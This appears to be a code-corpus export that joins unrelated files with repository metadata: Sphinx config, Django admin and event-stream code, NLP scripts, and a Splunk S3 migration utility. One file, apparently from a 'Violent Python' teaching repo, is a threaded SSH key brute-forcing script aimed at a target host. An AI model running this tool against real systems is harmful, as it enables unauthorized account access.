# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pbtoolsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ufsm.tex', u'ufsm documentation',
u'Jonas Blixt', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = 'images/logo.jpg'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'ufsm', u'ufsm documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'ufsm', u'ufsm documentation',
author, 'ufsm', 'State machine library',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# extlins
extlinks = {
'github-blob':
('https://github.com/jonasblixt/ufsm/blob/v' + version + '/%s', ''),
'github-tree':
('https://github.com/jonasblixt/ufsm/tree/v' + version + '/%s', ''),
'codecov':
('https://codecov.io/gh/jonasblixt/ufsm/src/v' + version + '/%s', ''),
'codecov-tree':
('https://codecov.io/gh/jonasblixt/ufsm/tree/v' + version + '/%s', '')
}
| [
"jonpe960@gmail.com"
] | jonpe960@gmail.com |
0ad55bdb1eebab0cc2495a270f04bdfce36b26e9 | ec458edd64414566c119717c46fd00f6725ea6b0 | /CH2/3-bruteKey.py | 920875cb71cf000a6f7274f52e698c86e931d9e1 | [] | no_license | porterhau5/violent-python | ad235b0d7eab373649dd390d37193174518a81f2 | f33dba0f48002fe76615ed70b71e4e3bc7344956 | refs/heads/master | 2016-09-05T12:45:37.008027 | 2014-02-27T17:52:37 | 2014-02-27T17:52:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,376 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pexpect
import optparse
import os
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user,host,keyfile,release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user +\
'@' + host + ' -i ' + keyfile + opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT,perm_denied,\
ssh_newkey,conn_closed,'$','#',])
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
elif ret > 3:
print '[+] Success. ' + str(keyfile)
Stop = True
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser('usage %prog -H '+\
'<target host> -u <user> -d <directory>')
parser.add_option('-H', dest='tgtHost', type='string',\
help='specify target host')
parser.add_option('-d', dest='passDir', type='string',\
help='specify directory with keys')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passDir = options.passDir
user = options.user
if host == None or passDir == None or user == None:
print parser.usage
exit(0)
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
exit(0)
if Fails > 5:
print '[!] Exiting: '+\
'Too Many Connections Closed By Remote Host.'
print '[!] Adjust number of simultaneous threads.'
exit(0)
connection_lock.acquire()
fullpath = os.path.join(passDir, filename)
print '[-] Testing keyfile ' + str(fullpath)
t = Thread(target=connect,\
args=(user, host, fullpath, True))
child = t.start()
if __name__ == '__main__':
main()
| [
"porter.thomas.w@gmail.com"
] | porter.thomas.w@gmail.com |
1d64087b50a7754102a8f120289480550b469a86 | 41bd7d939207e94c8f6956f02b779f5084b23bf4 | /archives/admin.py | 8604e9655b6c0429d898e44ebeaf1a4f5c81a761 | [] | no_license | wd5/acanthes | 724b81c799ab04344c66691a054b2a555b3e3d77 | 8c4fd011e60e9869396f1a93b385133ebff74238 | refs/heads/master | 2021-01-17T12:13:35.216661 | 2012-06-13T13:05:06 | 2012-06-13T13:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,171 | py | from django.contrib import admin
from archives.models import *
class IntervenantAudioInline(admin.TabularInline):
model = IntervenantAudio
extra = 1
class AudioAdmin(admin.ModelAdmin):
inlines = (IntervenantAudioInline,)
list_display = ('id','subtitle', 'annee', 'genre', 'url_ecoute_intranet_adresse' )
list_filter = ('annee', )
search_fields = ['subtitle', ]
exclude = ('duree', 'total_durees', 'chemin_fichier', 'lien_test_web', 'dateissued_portail', 'horodatage_modification',
'url_export_ircam', 'type_ircam', 'date_enregistrement', 'acanthes',
'horodatage_creation', 'url_ecoute_extranet', 'url_ecoute_internet', 'url_ecoute_intranet', 'details_intranet_actuel_acda',
'oai_web_oai_mods', 'oai_id', 'oai_titleinfo_title', 'oai_typeofresource', 'oai_genre', 'oai_origininfo_place',
'oai_origininfo_publisher', 'oai_origininfo_datecaptured', 'oai_language_languageterm_1', 'oai_language_languageterm_2',
'oai_language_languageterm_3', 'oai_physicaldescription_form', 'oai_physicaldescription_internetmediatype', 'oai_physicaldescription_digitalorigin',
'oai_abstract', 'oai_targetaudience', 'oai_location_url_preview', 'oai_location_url_full', 'oai_location_physicallocation', 'oai_accesscondition',
'oai_recordinfo_recordcontentsource', 'oai_recordinfo_recordcreationdate', 'oai_recordinfo_recordchangedate', 'oai_recordinfo_recordidentifier',
'oai_recordinfo_languageofcataloging_languageterm', 'oai_publication')
class IntervenantAdmin(admin.ModelAdmin):
list_display = ('nom', 'prenom')
exclude = ('horodatage_creation', 'horodatage_modification')
search_fields = ['nom', 'prenom']
class LangueAdmin(admin.ModelAdmin):
list_display = ('languageterm',)
class LieuAdmin(admin.ModelAdmin):
list_display = ('placeterm', 'salle')
class OrchestreAdmin(admin.ModelAdmin):
list_display = ('nom_complet', 'sous_titre')
search_fields = ['nom_complet', ]
admin.site.register(Audio, AudioAdmin)
admin.site.register(Intervenant, IntervenantAdmin)
admin.site.register(Langue, LangueAdmin)
admin.site.register(Lieu, LieuAdmin)
admin.site.register(Orchestre, OrchestreAdmin) | [
"samuel.goldszmidt@gmail.com"
] | samuel.goldszmidt@gmail.com |
4214ef52a286e542963069c28dd6fc6baa4fb451 | a01aa15daf3f625420a0ab1bee18674361dee717 | /code/editData.py | c8f2189585959ddb98bd31f94e8d626c14256fae | [] | no_license | sirinda-p/sna_utcc | f6ddf92a2ce81ec7a9f69f8da0deafdf2dcc1fc2 | 39276ebd838a9d2d6ee209a4a50fe25e721473a3 | refs/heads/master | 2020-04-03T15:29:38.820434 | 2016-03-25T09:40:09 | 2016-03-25T09:40:09 | 39,806,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import os
from igraph import *
def mark():
oldpath = "/home/amm/Desktop/sna-git/data/"
newpath = oldpath+"mark_unsurveyed/"
error_list = []
fname_list = ["ICT55_friend.gml","ICT55_bf.gml","ICT55_study.gml"]
for fname in fname_list:
#for fname in os.listdir(oldpath):
## get source nodes
f_r = open(oldpath+fname,"r")
id_set = set()
lines = f_r.readlines()
for line in lines:
if len(line.split())>1:
fst, snd = line.split()
if fst.strip()=="id":
newid = snd.strip()[5::]
if newid not in id_set:
id_set.add(newid)
## get IDs not in id_set (IDs still in official student list but are unreachable)
## These IDs won't appear as 'source' but can be 'target'
## Have to remove those edges whose targets are the unreachable
mark()
| [
"sirinda111@gmail.com"
] | sirinda111@gmail.com |
f457a785953ecdf207ae402a089a175cd1f04eb3 | fa7c4eb33a1bf329469f67eb1fe13ae8e8d17f11 | /my_env/bin/tox | d1ea66b4d8ef1f0ca669c0ce52de9148956084e3 | [] | no_license | richa696/rich | cea39c0266fc61365388d7248d632d965d8ecbee | 168768bd80fb5941cc0c6232b9b38d37a675d0e2 | refs/heads/master | 2023-04-05T23:06:34.402323 | 2021-04-29T18:57:05 | 2021-04-29T18:57:05 | 362,917,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | #!/home/richa/ProjectFolder/my_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from tox import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
| [
"tiwariricha696@gmail.com"
] | tiwariricha696@gmail.com | |
38a28d7f0257148f8e867dcfd6350f0e6276dd14 | f7dd190a665a4966db33dcc1cc461dd060ca5946 | /venv/Lib/site-packages/graphene/types/tests/test_schema.py | 88af101988356209c9722d213bfa5137344960fa | [] | no_license | Darwin939/macmeharder_back | 2cc35e2e8b39a82c8ce201e63d9f6a9954a04463 | 8fc078333a746ac7f65497e155c58415252b2d33 | refs/heads/main | 2023-02-28T12:01:23.237320 | 2021-02-02T17:37:33 | 2021-02-02T17:37:33 | 328,173,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | import pytest
from ..field import Field
from ..objecttype import ObjectType
from ..scalars import String
from ..schema import Schema
class MyOtherType(ObjectType):
field = String()
class Query(ObjectType):
inner = Field(MyOtherType)
def test_schema():
schema = Schema(Query)
assert schema.get_query_type() == schema.get_graphql_type(Query)
def test_schema_get_type():
schema = Schema(Query)
assert schema.Query == Query
assert schema.MyOtherType == MyOtherType
def test_schema_get_type_error():
schema = Schema(Query)
with pytest.raises(AttributeError) as exc_info:
schema.X
assert str(exc_info.value) == 'Type "X" not found in the Schema'
def test_schema_str():
schema = Schema(Query)
assert (
str(schema)
== """schema {
query: Query
}
type MyOtherType {
field: String
}
type Query {
inner: MyOtherType
}
"""
)
def test_schema_introspect():
schema = Schema(Query)
assert "__schema" in schema.introspect()
| [
"51247000+Darwin939@users.noreply.github.com"
] | 51247000+Darwin939@users.noreply.github.com |
3fb37feddd63cc8a4d7f068c61376c3140e247f1 | 033dcdc8c51d41de1d8a48e042dff392d0215f7f | /django_eventstream/eventrequest.py | 6a9de59e80a9208d451c74ebf5c2a146153334da | [
"MIT"
] | permissive | paolodina/django-eventstream | a726b70122800aabe7674a4419e3545e81ae82ec | d8e90c121704e727becdb37fae33cf610898ec2e | refs/heads/master | 2022-11-06T17:43:22.338747 | 2020-06-16T08:24:09 | 2020-06-16T08:24:09 | 272,642,690 | 0 | 0 | MIT | 2020-06-16T07:43:41 | 2020-06-16T07:43:40 | null | UTF-8 | Python | false | false | 3,049 | py | import time
import jwt
import six
from django.contrib.auth import get_user_model
from django.conf import settings
from .utils import parse_last_event_id, get_channelmanager
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
class EventRequest(object):
class Error(ValueError):
pass
class GripError(Error):
pass
class ResumeNotAllowedError(Error):
pass
def __init__(self, http_request=None, channel_limit=10, view_kwargs=None):
if view_kwargs is None:
view_kwargs = {}
self.channels = set()
self.channel_last_ids = {}
self.is_recover = False
self.user = None
if http_request:
self.apply_http_request(http_request,
channel_limit=channel_limit,
view_kwargs=view_kwargs)
def apply_http_request(self, http_request, channel_limit, view_kwargs):
is_next = False
is_recover = False
user = None
es_meta = {}
if http_request.GET.get('es-meta'):
es_meta = jwt.decode(http_request.GET['es-meta'], settings.SECRET_KEY.encode('utf-8'))
if int(time.time()) >= es_meta['exp']:
raise ValueError('es-meta signature is expired')
if 'user' in es_meta:
if es_meta['user'] != 'anonymous':
user = get_user_model().objects.get(pk=es_meta['user'])
else:
if hasattr(http_request, 'user') and http_request.user.is_authenticated:
user = http_request.user
if 'channels' in es_meta:
channels = es_meta['channels']
else:
channelmanager = get_channelmanager()
channels = channelmanager.get_channels_for_request(http_request, view_kwargs)
if len(channels) < 1:
raise EventRequest.Error('No channels specified')
if len(channels) > channel_limit:
raise EventRequest.Error('Channel limit exceeded')
if http_request.GET.get('link') == 'next':
is_next = True
if http_request.GET.get('recover') == 'true':
channel_last_ids = {}
is_recover = True
for grip_channel, last_id in six.iteritems(http_request.grip.last):
if not grip_channel.startswith('events-'):
continue
channel = unquote(grip_channel[7:])
if channel in channels:
channel_last_ids[channel] = last_id
else:
last_event_id = http_request.META.get('HTTP_LAST_EVENT_ID')
if not last_event_id:
# take the first non-empty param, from the end
for val in reversed(http_request.GET.getlist('lastEventId')):
if val:
last_event_id = val
break
if last_event_id:
if last_event_id == 'error':
raise EventRequest.ResumeNotAllowedError(
'Can\'t resume session after stream-error')
try:
parsed = parse_last_event_id(last_event_id)
channel_last_ids = {}
for channel, last_id in six.iteritems(parsed):
channel = unquote(channel)
if channel in channels:
channel_last_ids[channel] = last_id
except:
raise EventRequest.Error(
'Failed to parse Last-Event-ID or lastEventId')
else:
channel_last_ids = {}
self.channels = channels
self.channel_last_ids = channel_last_ids
self.is_next = is_next
self.is_recover = is_recover
self.user = user
| [
"justin@karneges.com"
] | justin@karneges.com |
d0844357d421f9aad1b024b3426a21f65f26b9a8 | 66f20f488ef479a9bad1c379ad33f29522a0cacb | /main.py | 71eaf75adfbb6e4cdbdb09457fc0da5527924b72 | [] | no_license | daniele21/NLP_genre_detection | b221b1f5755b7b9a5b244bacb8ba32a2f8e28f17 | 8ece41c38eea67d61f5c014d06f759434d698ad3 | refs/heads/master | 2023-04-10T17:01:12.346117 | 2021-04-21T13:45:29 | 2021-04-21T13:45:29 | 333,126,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,719 | py | from argparse import ArgumentParser
import logging
from scripts.pipeline.dataset_pipeline import generate_training_dataset
from scripts.pipeline.training_pipeline import training_pipeline
from scripts.training.model_training import train_model
logger = logging.getLogger(__name__)
def main(args):
params = {}
params['data'] = {'train': True,
'split_size': args.split_size,
'shuffle': args.shuffle,
'seed': args.seed,
'preload': args.preload,
'data_path': args.data_path,
'tokenizer': args.tokenizer}
params['network'] = {'word_emb_size': args.emb_size,
'weights': None,
'trainable': True,
'lstm_units': args.lstm_units,
'dropout_rate': args.dropout,
# 'optimizer': tf.keras.optimizers.Adam,
'lr': args.lr,
# 'loss': tf.keras.losses.BinaryCrossentropy(from_logits=True),
}
params['training'] = {'batch_size': args.batch_size,
'epochs': args.epochs}
dataset = args.dataset
train = args.train
if not dataset and train:
model = training_pipeline(params)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-t', '--train', action='store_true', help='Training Pipeline Mode')
parser.add_argument('-d', '--dataset', action='store_true', help='Dataset Pipeline Mode')
parser.add_argument('--split_size', type=float, default=0.8, help='Split size for dataset')
parser.add_argument('--shuffle', type=bool, default=True, help='Shuffle dataset')
parser.add_argument('--seed', type=int, default=2021, help='Seed')
parser.add_argument('--preload', type=str, default='resources/data/prep_data_v2.csv', help='Preload for dataset')
parser.add_argument('--data_path', type=str, default='resources/train.csv', help='Dataset to load')
parser.add_argument('--tokenizer', type=str, default='custom', help='Tokenizer: custom or keras')
parser.add_argument('--emb_size', type=int, default=50, help='Word embedding size')
parser.add_argument('--lstm_units', type=int, default=30, help='LSTM units')
parser.add_argument('--dropout', type=float, default=0.3, help='Dropout')
parser.add_argument('--lr', type=float, default=1e-2, help='Learning Rate')
parser.add_argument('--batch_size', type=int, default=32, help='Batch Size')
parser.add_argument('--epochs', type=int, default=1, help='epochs')
parsed_args = parser.parse_args()
main(parsed_args) | [
"danielemoltisanti@live.it"
] | danielemoltisanti@live.it |
f600154069f115ceac5a31461d0b5aa19ee162f8 | e3b4e076a301cf2cbb78014dfa4f04e1bb368e15 | /treedata.py | d3e0f330e88094e6b266a062a2f6eea8532340f1 | [] | no_license | jzhao20/nlp_assignment_3 | 77e2cf6e0df2b758a16ac71b0ef18a722f5afb79 | d067f89605c0b04138a90e41e2defa80a3a1e1f2 | refs/heads/main | 2023-08-07T18:13:18.869462 | 2021-09-30T17:26:56 | 2021-09-30T17:26:56 | 411,349,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,384 | py | # posdata.py
from typing import List
import re
class TaggedToken:
"""
Wrapper for a token paired with a part-of-speech
"""
def __init__(self, word: str, tag: str):
self.word = word
self.tag = tag
def __repr__(self):
return "(%s, %s)" % (self.word, self.tag)
def __str__(self):
return self.__repr__()
class LabeledSentence:
"""
Thin wrapper over a sequence of Tokens representing a sentence.
"""
def __init__(self, tagged_tokens):
self.tagged_tokens = tagged_tokens
def __repr__(self):
return repr([repr(tok) for tok in self.tagged_tokens])
def __str__(self):
return self.__repr__()
def __len__(self):
return len(self.tagged_tokens)
def get_words(self):
return [tok.word for tok in self.tagged_tokens]
def get_tags(self):
return [tok.tag for tok in self.tagged_tokens]
def labeled_sent_from_words_tags(words, tags):
return LabeledSentence([TaggedToken(w, t) for (w, t) in zip(words, tags)])
def read_labeled_sents(file):
"""
Reads a file with word<tab>tag per line, with one blank line between sentences
:param file:
:return:
"""
f = open(file, encoding='utf-8')
sentences = []
curr_tokens = []
for line in f:
stripped = line.strip()
if stripped != "":
fields = stripped.split("\t")
if len(fields) == 2:
curr_tokens.append(TaggedToken(fields[0], fields[1]))
elif stripped == "" and len(curr_tokens) > 0:
sentences.append(LabeledSentence(curr_tokens))
curr_tokens = []
print("Read %i sents from %s" % (len(sentences), file))
return sentences
class Tree:
"""
Recursive type that defines a tree structure. Wraps a label (for the current node) and a list of children which
are also Tree objects
"""
def __init__(self, label: str, children=[]):
self.label = label
self.children = children
def __repr__(self):
if self.is_preterminal():
return "(%s %s)" % (self.label, self.children[0].label)
else:
return "(%s %s)" % (self.label, " ".join([repr(c) for c in self.children]))
def __str__(self):
return self.__repr__()
def is_terminal(self):
return len(self.children) == 0
def is_preterminal(self):
return len(self.children) == 1 and self.children[0].is_terminal()
def render_pretty(self):
return self._render_pretty_helper(0)
def _render_pretty_helper(self, indent_level):
if self.is_terminal():
return (" " * indent_level) + self.label
if self.is_preterminal():
return (" " * indent_level) + "(" + self.label + " " + self.children[0].label + ")"
else:
return (indent_level * " ") + "(" + self.label + "\n" + "\n".join([c._render_pretty_helper(indent_level + 2) for c in self.children])
def set_children(self, new_children):
self.children = new_children
def add_child(self, child):
self.children.append(child)
def _read_tree(line: str) -> Tree:
"""
:param line: a PTB-style bracketed representation of a string, like this: ( (S ... ) ) or (ROOT (S ... ) )
:return: the Tree object
"""
# Put in an explicit ROOT symbol for the root to make parsing easier
raw_line = line
if line.startswith("( "):
line = "(ROOT " + line[1:]
# Surround ( ) with spaces so splitting works
line = re.sub(r"\(", " ( ", line)
line = re.sub(r"\)", " ) ", line)
# We may have introduced double spaces, so collapse these down
line = re.sub(r"\s{2,}", " ", line)
tokens = list(filter(lambda tok: len(tok) > 0, line.split(" ")))
# Parse the bracket representation into a tree
just_saw_open = False
stack = []
latest_word = ""
for tok in tokens:
if tok == "(":
just_saw_open = True
elif tok == ")":
if latest_word != "":
tree = stack[-1]
tree.add_child(Tree(latest_word, []))
latest_word = ""
stack[-2].add_child(tree)
stack = stack[:-1]
else:
if len(stack) >= 2: # only violated for the last paren
stack[-2].add_child(stack[-1])
stack = stack[:-1]
else:
if just_saw_open:
tree = Tree(tok, [])
stack.append(tree)
just_saw_open = False
else:
# The only time we get a string *not* after an open paren is when it's a word and not a tag
latest_word = tok
if len(stack) != 1:
print("WARNING: bad line: %s" % raw_line)
return stack[0]
def read_parse_data(file):
"""
:param file: a file in PTB format, one tree per line
:return: A list of Trees
"""
f = open(file, encoding='utf-8')
trees = []
for line in f:
stripped = line.strip()
trees.append(_read_tree(stripped))
if len(trees) % 10000 == 0:
print("Read %i trees" % len(trees))
return trees
if __name__=="__main__":
trees = read_parse_data("data/alltrees_dev.mrg.oneline")
for i in range(0, 10):
print("==========================")
print(trees[i].render_pretty())
| [
"jzhaotxus@gmail.com"
] | jzhaotxus@gmail.com |
33af5581f9f4a7828383e77b5e0c423a4f3bed87 | 972dab2bb13ea53395683c45492e035d8c46c94b | /apps/proyectos/urls.py | c9ca782b6538537ab4d5e48e6eaa150698521378 | [] | no_license | WilfredLemus/BibliotecaCodigo | 421e15b3ceca79b575d6c92538b2795706516a79 | cc6f9406eeddb950faa8ad76c59eb01a3220835a | refs/heads/master | 2021-05-27T17:58:30.641169 | 2014-01-27T01:58:02 | 2014-01-27T01:58:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | from django.conf.urls import patterns, url
urlpatterns = patterns ('apps.proyectos.views',
url(r'^proyectos/$','view_proyectos', name = 'proyectos'),
url(r'^add/proyecto/$','view_agregar_proyecto', name = 'agregar_proyecto'),
url(r'^proyecto/editar/(?P<id_proyecto>.*)/$','editar_proyecto_view',name='editar_proyecto'),
url(r'^proyecto/detalles/(?P<id_proyecto>.*)/$','single_proyecto_view',name='detalle_proyecto'),
url(r'^proyecto/eliminar/(?P<id_proyecto>.*)/$','eliminiar_proyecto_view',name='eliminar_proyecto'),
)
| [
"debian789@gmail.com"
] | debian789@gmail.com |
3175238714d0bced9a25c0a8ef31ca52742ce751 | 0d85ca475e5aba14eddf1246c0baff66e1f55a98 | /falcon-query/soft/open-falcon/portal/env/bin/easy_install | 3b8f471024acc74e998c22afd47f2eb619bb55cf | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | xinghui-hou/docker | 2a71a40efee0b4659924ada24b46efb3cd1e67ee | dccd48383533b4d47f1ac42005df007a3b8c6e53 | refs/heads/master | 2020-04-18T04:59:58.952180 | 2017-11-30T07:13:40 | 2017-11-30T07:13:40 | 67,863,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | #!/usr/local/open-falcon/portal/env/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==0.9.8','console_scripts','easy_install'
__requires__ = 'setuptools==0.9.8'
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.exit(
load_entry_point('setuptools==0.9.8', 'console_scripts', 'easy_install')()
)
| [
"hxh-x@163.com"
] | hxh-x@163.com | |
fa935631baa4e8f18f2cf046d8623296ab6d84d1 | 31442711c0efd06805349594d56519ad2d5e144b | /bucketUtilNew.py | 119f9622a99bab12fdb8cd79552c63d5cf84d746 | [] | no_license | 1989jpj/s3migration | 3d24975291b41c1a4945642b1b5883799a46cf42 | a7c772593d335e8f75dca570e668dfb4aa6e1c03 | refs/heads/master | 2021-01-18T14:29:42.851575 | 2016-06-17T18:54:05 | 2016-06-17T18:54:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,352 | py | import splunk.clilib.cli_common
# Import with "from" to minimize changes to splunkDBPaths().
from splunk.clilib.info_gather import normalize_path
#from info_gather import normalize_path
import argparse, copy, hashlib, json, os, re, shutil, subprocess, sys, time
import collections, glob, hmac, logging, operator, requests, StringIO, socket, urllib
import pprint
import lxml.etree as et
# - Usage:
# - Scan for files in paths.
# - Next execute: Checksum stuff.
# - Next execute: Do S3 uploads.
# - Optional: Check MD5s before this.
# - Must also upload checksums file.
# - Then get list of all buckets in S3.
# - Generate new owner list.
# - Download.
# - Verify checksums.
# - Stop Splunk, move data into place, start Splunk.
# User configurable. Don't include leading or trailing slashes.
# S3_BASE_PATH = "splunkcloud-citrix-prod-migration/Production"
S3_BASE_PATH = "splunkcloud-fb-migration/Production"
KEY_MD5HASH = "md5Hash"
KEY_METADATA = "metadata"
S3_URL_PREFIX = "s3://"
S3_HOSTNAME = "s3.amazonaws.com"
XML_AWS_NS = "http://s3.amazonaws.com/doc/2006-03-01/"
KEY_EXTRADATA = "EXTRADATA"
KEY_CHKSUMLIST = "checksumlist"
MODE_UPLOAD = "upload"
MODE_DOWNLOAD = "download"
STAGING_DIR = "S3_DATA_IMPORT_STAGING"
class IndexLocation(object):
VALID_PATHKEYS = ('homePath', 'coldPath', 'thawedPath')
def __init__(self, indexName, dirPath, dirType):
if not indexName:
raise Exception, "Bug: IndexLocation created with empty index name!"
self.indexName = indexName
if not dirPath:
raise Exception, "Bug: IndexLocation created with empty dir!"
self.dirPath = dirPath
if dirType not in self.VALID_PATHKEYS:
raise Exception, "Bug: IndexLocation created with invalid directory" \
" type=\"%s\"!" % dirType
self.dirType = dirType
computed_db_paths = None
def splunkDBPaths(mergedIndexConf):
"""This is stolen directly from splunk.clilib.info_gather.py, with a few
modifications so we can tell which buckets reside in warm vs cold. Some
less than ideal components are left to make a later diff easier to read."""
# if cached, return answer -- surprisingly computing this takes like 4 seconds
global computed_db_paths
if computed_db_paths:
return computed_db_paths
# first get all the index path config strings
# Will contain IndexLocation objects.
index_paths = []
index_confs = mergedIndexConf
req_parm_warning = 'Indexing stanza [%s] is missing required parameter "%s"'
volumes = {}
pathKeys = ['homePath', 'coldPath', 'thawedPath']
for stanza_name in index_confs.keys():
if stanza_name == 'default':
continue
stanza = index_confs[stanza_name]
# ignore disabled index stanzas
if stanza.get('disabled') == "true":
continue
if stanza_name.startswith('volume:'):
# skip broken volume groups
if not stanza.has_key('path'):
logging.warn("The indexing volume %s does not have a path defined, this is an error." % (stanza_name))
continue
volumes[stanza_name] = stanza['path']
# ignore all virtual indexes for diag-building purposes, but warn if they seem broken
elif stanza_name.startswith('provider-family:'):
if not stanza.has_key('vix.mode'):
logging.warn(req_parm_warning % (stanza_name, 'vix.mode'))
if not stanza.has_key('vix.command'):
logging.warn(req_parm_warning % (stanza_name, 'vix.command'))
continue
elif stanza_name.startswith('provider:'):
if not stanza.has_key('vix.family'):
logging.warn(req_parm_warning % (stanza_name, 'vix.family'))
continue
elif stanza.has_key("vix.provider"):
logging.info('Virtual index "%s" found, not scanning for diag.' % stanza_name)
continue
# it's an index definition, get the paths
else:
for pathKey in pathKeys:
if not stanza.has_key(pathKey):
logging.warn("The index %s does not have a value set for %s, this is unusual." % (stanza_name, pathKey))
else:
index_paths.append(IndexLocation(stanza_name,
stanza.get(pathKey), pathKey))
def expand_vol_path(orig_path, volumes=volumes):
if not orig_path.startswith('volume:'):
return orig_path
tmp_path = orig_path
if os.name == "nt" and (not '\\' in tmp_path) and ('/' in tmp_path):
tmp_path = orig_path.replace('/','\\')
if not os.path.sep in tmp_path:
logging.warn("Volume based path '%s' contains no directory seperator." % orig_path)
return None
volume_id, tail = tmp_path.split(os.path.sep, 1)
if not volume_id in volumes:
logging.warn("Volume based path '%s' refers to undefined volume '%s'." % (orig_path, volume_id))
return None
return os.path.join(volumes[volume_id], tail)
# detect and expand volume paths
paths = copy.deepcopy(index_paths)
for indexPath in paths:
indexPath.dirPath = expand_vol_path(indexPath.dirPath)
paths = filter(lambda x: x.dirPath, paths) # remove chaff from expand_vol_path
for indexPath in paths:
indexPath.dirPath = normalize_path(indexPath.dirPath)
paths = filter(lambda x: x.dirPath, paths) # remove chaff from normalize_paths
# cache answer
computed_db_paths = paths
return paths
def filter_internal_index_dirs(indexLocations):
"""For the purposes of moving indexed data to another instance, the below
dirs tend to not be very useful. (Fishbucket, internal, introspection..)"""
# The slashes here are so we match a dir segment - don't confuse them with
# regex syntax!
# TODO: make this configurable at command line.
blacklistRE = re.compile("/(fishbucket|_introspection)/")
retList = []
for thisPath in indexLocations:
if None == blacklistRE.search(thisPath.dirPath):
retList.append(thisPath)
return retList
def failed_test(msg):
sys.stderr.write("\nTEST FAILED: %s\n")
sys.exit(1)
class BucketCollection(object):
KEY_INDEXNAME = "indexName"
KEY_DIRTYPE = "dirType"
KEY_BUCKETPARENTDIR = "bucketParentDir"
